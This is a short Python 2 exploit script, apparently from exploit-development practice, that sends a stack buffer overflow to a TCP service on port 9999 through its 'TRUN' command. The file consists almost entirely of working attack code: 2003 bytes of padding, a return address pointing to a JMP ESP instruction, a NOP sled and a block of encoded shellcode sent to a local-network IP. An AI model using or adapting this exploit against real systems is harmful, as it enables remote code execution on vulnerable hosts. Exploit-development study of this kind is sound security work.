3_shellcode.py

#!/usr/bin/python2
#did the above because this script wasn't working in python3
#fix for python3 later
import sys, socket

payload = (
"\xbf\xc5\xba\x9a\xe9\xda\xca\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x52\x31\x7d\x12\x83\xc5\x04\x03\xb8\xb4\x78\x1c\xbe"
"\x21\xfe\xdf\x3e\xb2\x9f\x56\xdb\x83\x9f\x0d\xa8\xb4\x2f"
"\x45\xfc\x38\xdb\x0b\x14\xca\xa9\x83\x1b\x7b\x07\xf2\x12"
"\x7c\x34\xc6\x35\xfe\x47\x1b\x95\x3f\x88\x6e\xd4\x78\xf5"
"\x83\x84\xd1\x71\x31\x38\x55\xcf\x8a\xb3\x25\xc1\x8a\x20"
"\xfd\xe0\xbb\xf7\x75\xbb\x1b\xf6\x5a\xb7\x15\xe0\xbf\xf2"
"\xec\x9b\x74\x88\xee\x4d\x45\x71\x5c\xb0\x69\x80\x9c\xf5"
"\x4e\x7b\xeb\x0f\xad\x06\xec\xd4\xcf\xdc\x79\xce\x68\x96"
"\xda\x2a\x88\x7b\xbc\xb9\x86\x30\xca\xe5\x8a\xc7\x1f\x9e"
"\xb7\x4c\x9e\x70\x3e\x16\x85\x54\x1a\xcc\xa4\xcd\xc6\xa3"
"\xd9\x0d\xa9\x1c\x7c\x46\x44\x48\x0d\x05\x01\xbd\x3c\xb5"
"\xd1\xa9\x37\xc6\xe3\x76\xec\x40\x48\xfe\x2a\x97\xaf\xd5"
"\x8b\x07\x4e\xd6\xeb\x0e\x95\x82\xbb\x38\x3c\xab\x57\xb8"
"\xc1\x7e\xf7\xe8\x6d\xd1\xb8\x58\xce\x81\x50\xb2\xc1\xfe"
"\x41\xbd\x0b\x97\xe8\x44\xdc\x58\x44\x46\x72\x31\x97\x46"
"\x9b\x9d\x1e\xa0\xf1\x0d\x77\x7b\x6e\xb7\xd2\xf7\x0f\x38"
"\xc9\x72\x0f\xb2\xfe\x83\xde\x33\x8a\x97\xb7\xb3\xc1\xc5"
"\x1e\xcb\xff\x61\xfc\x5e\x64\x71\x8b\x42\x33\x26\xdc\xb5"
"\x4a\xa2\xf0\xec\xe4\xd0\x08\x68\xce\x50\xd7\x49\xd1\x59"
"\x9a\xf6\xf5\x49\x62\xf6\xb1\x3d\x3a\xa1\x6f\xeb\xfc\x1b"
"\xde\x45\x57\xf7\x88\x01\x2e\x3b\x0b\x57\x2f\x16\xfd\xb7"
"\x9e\xcf\xb8\xc8\x2f\x98\x4c\xb1\x4d\x38\xb2\x68\xd6\x58"
"\x51\xb8\x23\xf1\xcc\x29\x8e\x9c\xee\x84\xcd\x98\x6c\x2c"
"\xae\x5e\x6c\x45\xab\x1b\x2a\xb6\xc1\x34\xdf\xb8\x76\x34"
"\xca")

padding = "A" * 2003  #offset = 2003
eip = "\xaf\x11\x50\x62" #0x625011af contains JMP ESP
nopsled = "\x90" * 32
overflow = padding + eip + nopsled + payload


try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('192.168.0.111',9999))   #could make these input variables later

    s.send(('TRUN /.:/' + overflow))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()